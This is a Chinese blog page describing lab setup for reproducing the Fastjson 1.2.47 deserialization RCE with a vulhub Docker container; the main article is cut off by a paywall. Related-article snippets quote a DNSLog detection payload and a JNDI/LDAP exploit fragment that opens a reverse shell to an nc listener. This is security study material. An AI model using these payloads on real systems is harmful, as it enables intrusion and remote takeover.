Fastjson 1.2.47 远程命令执行漏洞复现分析环境

最新推荐文章于 2025-09-19 15:10:00 发布

原创

最新推荐文章于 2025-09-19 15:10:00 发布 · 1.4k 阅读

5 ·

CC 4.0 BY-SA版权

文章标签：

#json

本文详细介绍了如何在Fastjson1.2.47版本的Docker容器中利用远程命令执行漏洞，并通过DNSLog进行验证，同时分析了漏洞原因和提供了一种环境配置方法。

Fastjson 1.2.47 远程命令执行漏洞

1、靶机环境安装

1.1、虚机机linux环境参数

1、操作系统：CentOS Linux release 7.4.1708 (Core)
2、IP：192.168.127.132

1.1、docker与docker compose安装

1.2、下载https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce到本地临时路径

https://github.com/vulhub/vulhub/tree/master/fastjson/1.2.47-rce

[root@localhost docker]# pwd
/usr/local/src/docker
[root@localhost docker]# ls
docker-compose.yml
[root@localhost docker]# cat docker-compose.yml 
version: '2'
services:
 web:
   image: vulhub/fastjson:1.2.45
   ports:
    - "8090:8090"

1.3、启动靶机服务

启动窗口实例服务

docker-compose up -d

最低0.47元/天解锁文章

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

itgather

关注关注

13
点赞
踩
5

收藏

觉得还不错? 一键收藏
1
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

Fastjson 1.2.47 远程命令执行漏洞（CNVD-2019-22238）

黑白的博客

11-23

2291

声明好好学习，天天向上漏洞描述 Fastjson 是阿里巴巴的开源JSON解析库，它可以解析 JSON 格式的字符串，支持将 Java Bean 序列化为 JSON 字符串，也可以从 JSON 字符串反序列化到 JavaBean。 Fastjson提供了autotype功能，允许用户在反序列化数据中通过“@type”指定反序列化的类型，其次，Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法，那么当组件开启了autotype功能并且反序列化不可信数据时，攻击者可

复现Fastjson 1.2.47 远程命令执行漏洞

qq_54713392的博客

05-14

1410

复现Fastjson 1.2.47 远程命令执行漏洞漏洞原理： Fastjson是阿里巴巴公司开源的一款json解析器，其性能优越，被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。攻击机：window 10 IP地址192.168.32.1 靶机：ubantu 16.04 IP地址192.168.32.142 攻击步骤：（1）开启Fastjson

1 条评论您还未登录，请先登录后发表或查看评论

fastjson 1.2.47 远程命令执行漏洞

weixin_42786460的博客

10-14

905

fastjson 1.2.47 远程命令执行漏洞

Fastjson1.2.47远程代码执行

最新发布

m0_63017297的博客

09-19

171

Fastjson 1.2.47远程代码执行漏洞利用

fastjson1.2.47远程代码执行&JNDI漏洞利用工具

归零者的博客

06-23

1228

Fastjson是一种Java库，用于处理JSON数据。它提供了一种简单高效的方式，用于将Java对象序列化为JSON，以及将JSON反序列化为Java对象。Fastjson以其高速和低内存消耗而闻名，因此在Java应用中广泛应用于JSON的序列化和反序列化。它支持各种功能，如JSON解析、序列化、反序列化以及对JSON数据的操作。Fastjson被广泛应用于Web应用、移动应用和其他基于Java的系统中，用于处理JSON数据。

fastjson-1.2.47

12-07

fastjson-1.2.34

22 - vulhub - Fastjson 1.2.47 远程命令执行漏洞

易编橙 · 终身成长社群，相遇已是上上签！

11-16

1451

Fastjson是阿里巴巴公司开源的一款json解析器，其性能优越，被广泛应用于各大厂商的Java项目中。fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。因此在这里建议请及时更新至最新版本！

Fastjson 1.2.47反序列化漏洞复现

m0_54899775的博客

03-16

3631

Fastjson 1.2.47反序列化漏洞复现

fastjson-1.2.47.jar

03-16

fastjson-1.2.47.jar,用于将java转换成json**********

fastjson最新版本库1.2.47

12-25

fastjon最新版本库1.2.47，分享资源，一起学习。

fastjson-1.2.47及源码、简单示例

08-30

fastjson-1.2.47及源码、简单示例

fastjson-1.2.47-API文档-中文版.zip

04-08

赠送jar包：fastjson-1.2.47.jar；赠送原API文档：fastjson-1.2.47-javadoc.jar；赠送源代码：fastjson-1.2.47-sources.jar；包含翻译后的API文档：fastjson-1.2.47-javadoc-API文档-中文(简体)版.zip 对应Maven信息：groupId：com.alibaba，artifactId：fastjson，version：1.2.47 使用方法：解压翻译后的API文档，用浏览器打开“index.html”文件，即可纵览文档内容。人性化翻译，文档中的代码和结构保持不变，注释和说明精准翻译，请放心使用。

Fastjson 1.2.47 远程命令执行漏洞

m0_63241485的博客

08-17

1341

astjson提供了autotype功能，允许用户在反序列化数据中通过“@type”指定反序列化的类型。Fastjson自定义的反序列化机制时会调用指定类中的setter方法及部分getter方法，那么当组件开启了autotype功能并且反序列化不可信数据时，攻击者可以构造数据，使目标应用的代码执行流程进入特定类的特定setter或者getter方法中，若指定类的指定方法中有可被恶意利用的逻辑（也就是通常所指的“Gadget”），则会造成一些严重的安全问题。...

fastjson反序列化漏洞（fastjson-1.2.47）

zyer

04-28

4415

fastjson 1.2.47 爆出了最为严重的漏洞，可以在不开启 AutoTypeSupport 的情况下进行反序列化的利用。一.原理测试代码Test.java import com.alibaba.fastjson.JSON; import com.alibaba.fastjson.JSONObject; public class Test { public static void main(String[] args) { String s2 =...

Fastjson【RCE1.2.47】漏洞复现

02-24

3104

Fastjson漏洞原理和RCE1.2.47漏洞复现

Fastjson 1.2.47 远程命令执行漏

玄道的网安博客

06-11

2452

1. 漏洞简介 Fastjosn 无疑是这两年的漏洞之王, 一手反序列化RCE影响无数厂商, 目前1.2.48以下版本稳定受影响, 1.2.68以下版本开启Autotype会受到影响 (不排除传说中的1.2.67以下RCE漏洞, 期待八仙过海) 2. 影响组件 Fastjson < 1.2.48 (<1.2.68?) 3. 漏洞指纹可以通过DNS回显的方式检测后端是否使用Fastjson {"@type":"java.net.Inet4Address", "val":"dnsl

Fastjson 1.2.47反序列化远程代码执行（CNVD-2019-22238）

Long___Xiao的博客

02-28

789

如果这些特定方法中存在可被恶意利用的逻辑（通常被称为“Gadget”），那么攻击者就可能利用这些逻辑执行恶意代码，从而导致严重的安全问题。fastjson于1.2.24版本后增加了反序列化白名单，而在1.2.48以前的版本中，攻击者可以利用特殊构造的json字符串绕过白名单检测，成功执行任意命令。“dataSourceName”: “ldap://{JNDIExploit启动ldap服务的IP}:1389/Basic/ReverseShell/{开启nc服务的ip}/{nc端口}”,

fastjson1.2.47漏洞复现

07-27

- *1* *3* [Fastjson命令执行漏洞复现（1.2.47和1.2.24）](https://blog.csdn.net/xiaobai_20190815/article/details/124117105)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_...